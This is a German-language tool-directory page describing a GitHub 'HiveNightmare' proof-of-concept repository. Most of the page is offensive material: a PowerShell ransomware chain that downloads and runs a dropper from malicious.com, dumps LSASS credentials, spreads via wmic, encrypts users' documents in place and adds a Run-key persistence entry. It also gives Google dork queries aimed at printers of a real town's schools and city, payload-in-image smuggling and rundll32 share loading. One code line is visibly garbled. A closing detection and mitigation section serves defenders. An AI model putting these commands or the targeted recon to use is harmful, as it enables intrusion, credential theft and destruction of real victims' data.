Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Why-so-Serious-SAM — PoC-Schadsoftware, die den Exploit CVE-2021-36934 (falsche ACLs auf Schattenkopien) unter Verwendung einer dateilosen Red-Team-Methode auf Windows 10/11 mit LOLBins ausnutzt und SYSTEM- und SAM-Hives extrahiert, um lokale NTLM-Hashes zu erhalten. | Kitploit
Tools/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Privilege EscalationExploitationLaterale BewegungPost-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC-Schadsoftware, die den Exploit CVE-2021-36934 (falsche ACLs auf Schattenkopien) unter Verwendung einer dateilosen Red-Team-Methode auf Windows 10/11 mit LOLBins ausnutzt und SYSTEM- und SAM-Hives extrahiert, um lokale NTLM-Hashes zu erhalten.

Repository anzeigenWebseite
120vor 1 JahrNoch nicht geprüft

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


Inhaltsverzeichnis

  • Überblick
  • Funktionen
  • Lab-Simulationsbeispiel
  • Aufklärung mit Google Dorks
  • LOLBins-Überblick
  • Fileless Dropper Embedding
  • Ausnutzung von Print Spooler & HiveNightmare
  • Reflective DLL Injection
  • MITRE ATT&CK Mapping
  • Erkennung & Minderung
  • Rechtlicher Hinweis
  • Referenzen & weiterführende Literatur

Überblick

CVE-2021-36934/HiveNightmare ist ein pädagogisches Forschungsprojekt für Red/Purple Teams, das ein fileless Malware-Angriffsframework unter Windows 11 simuliert. Es ermöglicht die Nachbildung realer Angriffsketten unter Verwendung von MITRE ATT&CK-Techniken mit Fokus auf heimliche, dateilose Aktionen.

Warnung: Nur für Forschung und Schulungen in isolierten Laboren. Nicht auf Produktions- oder nicht autorisierten Systemen verwenden.


Funktionen

  • Simuliert Ende-zu-Ende fileless Ransomware/Wiper-Angriffe
  • Demonstriert die Nutzung von Living Off the Land Binaries (LOLBins)
  • Zeigt Credential Access, Privilege Escalation, Lateral Movement und Persistenz
  • Enthält praktische Lab- und Aufklärungsbeispiele
  • Ordnet MITRE ATT&CK für Blue-Team-Erkennungsübungen zu

Lab-Simulationsbeispiel

Die folgende PowerShell-Simulation zeigt eine typische fileless Ransomware-Angriffskette unter Verwendung integrierter Windows-Tools (LOLBins):

# Initial Access: Dropper laden
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Nutzlast decodieren und im Speicher laden
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/main/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# Dateiverschlüsselungsbeispiel
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistenz
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Aufklärung mit Google Dorks

Beispielziel: Identifizierung öffentlich zugänglicher Druckerdienste in Moberly, Missouri, die möglicherweise anfällig für Exploits wie PrintNightmare sind.

Beispielhafte Google-Dork-Abfragen:

inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins-Überblick

Living Off the Land Binaries (LOLBins) sind legitime, vertrauenswürdige Windows-Binärdateien, die häufig von Angreifern missbraucht werden, um Sicherheitskontrollen zu umgehen und dateilosen Schadcode auszuführen.

Beispielverwendung (Print Service Attack):

rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Angreifer verwenden LOLBins wie rundll32.exe, regsvr32.exe und powershell.exe, um Nutzlasten von Netzwerkfreigaben auszuführen, oft nachdem sie über Aufklärung freigelegte Drucker oder Server identifiziert haben.


Fileless Dropper Embedding

Ziel: Nutzlasten unauffällig ausliefern, indem Archive in Bilder eingebettet und mit nativen Tools extrahiert werden.

Schritte:

  1. Nutzlast einbetten:

    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Extrahieren und decodieren:

    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Diese Methode umgeht die herkömmliche Filterung von Dateierweiterungen und nutzt integrierte Tools für eine ausweichende Zustellung.


Reflective DLL Injection

Technik: Laden und Ausführen einer schädlichen DLL direkt im Speicher mittels reflektiven Ladens.

Beispiel:

rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Dies ermöglicht eine heimliche, speicherresidente Ausführung ohne Artefakte auf der Festplatte.


MITRE ATT&CK Mapping

PhaseTechnikIDBeschreibung
Initial AccessGültige Konten / Drive-by-CompromiseT1078, T1189Kompromittierung öffentlich zugänglicher Druckerschnittstellen
ExecutionDLL Side-Loading / LOLBinsT1218, T1055.001Reflektives Ausführen von DLLs über vertrauenswürdige Binärdateien
Privilege EscalationPrint Spooler Exploits / Hive-ACL-MissbrauchT1068, T1003.002SYSTEM-Zugriff und SAM-Hash-Extraktion
Defense EvasionDateilose Ausführung / Verschleierte DateienT1027, T1202Codierte Nutzlasten, ausgeliefert über certutil, mshta usw.
Credential AccessLSASS-Dumping / SAM-Hive-ZugriffT1003Credential-Dumping nach HiveNightmare
Lateral MovementSMB/Net-Share-EnumerationT1021.002Ausbreitung über Druckerfreigaben oder Spooler-Enumeration
ImpactDatenvernichtung / VerschlüsselungT1485, T1486Fileless Wiperware, ausgelöst durch DLL-Nutzlasten

Erkennung & Minderung

Erkennung

  • Sysmon + Sigma-Regeln:

    • Überwachung von rundll32.exe beim Laden von Nicht-System-DLLs
    • Achten auf ungewöhnliche Nutzung von certutil.exe, regsvr32.exe, mshta.exe
    • Verfolgen von Schattenkopie-Zugriffen durch Nicht-Administratoren
  • SIEM-Beispiele (ELK/Splunk):

    • Warnungen bei Ausführung von öffentlichen Freigaben
    • Auffällige Eltern/Kind-Prozessbeziehungen (z. B. explorer.exe startet rundll32.exe)
    • Verdächtige codierte Befehle in PowerShell oder CMD

Minderung

  • Deaktivieren des Druck-Spoolers, wo nicht benötigt:
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Alle Sicherheitspatches anwenden und ACLs härten
  • LOLBins mit AppLocker oder WDAC blockieren oder einschränken
  • EDR-Lösungen einsetzen, die reflektives DLL-Laden und speicherresidente Angriffe erkennen

Rechtlicher Hinweis

Tool herunterladen